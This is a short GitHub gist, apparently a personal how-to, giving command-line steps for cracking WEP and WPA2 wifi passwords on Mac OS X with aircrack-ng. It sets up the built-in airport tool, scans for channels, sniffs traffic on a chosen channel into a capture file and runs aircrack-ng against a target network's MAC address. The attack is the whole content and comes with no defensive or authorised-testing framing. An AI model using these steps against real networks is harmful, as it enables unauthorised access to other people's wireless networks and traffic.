-
-
Save Blaapje/6d4ecba0465815737de83df136cb4daf to your computer and use it in GitHub Desktop.
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Install the latest Xcode, with the Command Line Tools. | |
// Install Homebrew | |
// Install aircrack-ng: | |
brew install aircrack-ng | |
// Create the following symlink: | |
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/sbin/airport | |
// Figure out which channel you need to sniff: | |
sudo airport -s | |
// Sniff | |
// NOTE: the cap_file will be located in the /tmp/airportSniff*.cap. | |
sudo airport en1 sniff [CHANNEL] | |
// Crack | |
// Optional flags: -1 only 1 try with PTW | |
// -a attack mode (1/WEP, 2/WPA-PSK) | |
aircrack-ng -b [TARGET_MAC_ADDRESS] [CAP_FILE] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment